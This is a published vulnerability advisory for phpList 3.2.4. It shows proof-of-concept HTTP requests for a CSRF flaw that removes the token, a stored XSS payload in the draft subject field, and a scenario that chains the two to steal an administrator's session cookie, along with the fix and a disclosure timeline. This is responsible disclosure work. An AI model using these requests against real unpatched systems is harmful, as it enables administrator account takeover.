PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting

01 Jun 2016 | Reported by Mickael Dorigny | Type: packetstorm | Source: packetstormsecurity.com

PHPList 3.2.4 CSRF/XSS vulnerabilities in campaign drafts

`######################################################################  
# Exploit Title: PHPList v3.2.4 CSRF/XSS  
# Date: 01/06/2016  
# Author: Mickael Dorigny @ Synetis  
# Vendor or Software Link: https://www.phplist.com/  
# Version: 3.2.4  
# Category: CSRF/XSS  
######################################################################  
  
PHPList description:
======================================================================
phpList is open source software for managing mailing lists. It is designed for the dissemination of information such as newsletters, news and advertising to lists of subscribers. It is written in PHP and uses a MySQL database to store its data. phpList is free and open-source software released under the terms of the GNU Affero General Public License (AGPL).
  
Vulnerabilities description:
======================================================================
phpList version 3.2.4 is affected by the following vulnerabilities:
- CSRF (Cross Site Request Forgery)
- Stored XSS (Cross Site Scripting)
  
PoC n°1: CSRF on Campaign Draft Modification
============================================
The draft modification process is vulnerable to CSRF. When using the form, we can see that an anti-CSRF token is submitted, but it can be removed from the request without causing an error, so a page hosted by the attacker can replay the POST from the browser of a logged-in administrator. The only prerequisite to exploit this CSRF is to target an existing draft ID. This can be done with a simple script which sends multiple modification requests while incrementing the draft ID. To modify draft 5, use the following parameters:
  
[URL]  
http://server/admin/?page=send&id=5  
[POSTDATA]  
workaround_fck_bug=1&followupto=&subject=MODIFIED_SUBJECT&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=  
  
This vulnerability allows an attacker to make an authenticated user change campaign content and alter the user experience.
  
PoC n°2: Stored XSS on Campaign Draft Name
============================================
The campaign draft name, displayed when listing all campaign drafts, is vulnerable to Stored XSS. This means that the malicious code is saved in the database and rendered each time an admin/user visits the campaign draft list:
http://server/admin/?page=messages&tab=draft  
  
The following request exploits this vulnerability:
  
[URL]  
http://server/admin/?page=send&id=5  
[POSTDATA]  
workaround_fck_bug=1&followupto=&subject=DATA"><script>alert("XSS_again")</script>&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=  
  
Note that once this request is submitted, the user is not directly sent to the page that displays the XSS. They have to visit this page: http://server/admin/?page=messages&tab=draft
  
Through this vulnerability, an attacker could tamper with page rendering, redirect the victim to a fake login page, or capture user credentials such as cookies, and especially the administrator's.
  
Using two simple HTML pages with automatic JavaScript redirection, an attacker can chain these two vulnerabilities: the CSRF changes the campaign draft content so that it carries a JavaScript instruction, and the resulting JavaScript execution in the administrator's browser can be used to steal the session cookie or bypass every other anti-CSRF protection of the phpList installation, since script running in the victim's origin can read the tokens from the forms it submits. The scenario exploiting these two vulnerabilities is presented in the video in the "Additional resources" section.
  
Solution:
======================================================================
- Update your phpList installation to a newer version (3.2.5 or later - https://www.phplist.org/newslist/phplist-3-2-5-whats-new/)
  
Additional resources:
======================================================================  
- https://youtu.be/cU6ob4sCKgs  
- https://www.phplist.org/newslist/phplist-3-2-5-whats-new/  
  
Report timeline:
======================================================================  
2016-05-11 : Advisory submitted to editor  
2016-05-26 : Version 3.2.5 released with fixes  
2016-06-01 : Public Advisory release  
  
Credits:
======================================================================  
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr  
  
My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/  
  
--  
SYNETIS   
CONTACT: www.synetis.com | www.information-security.fr  
`
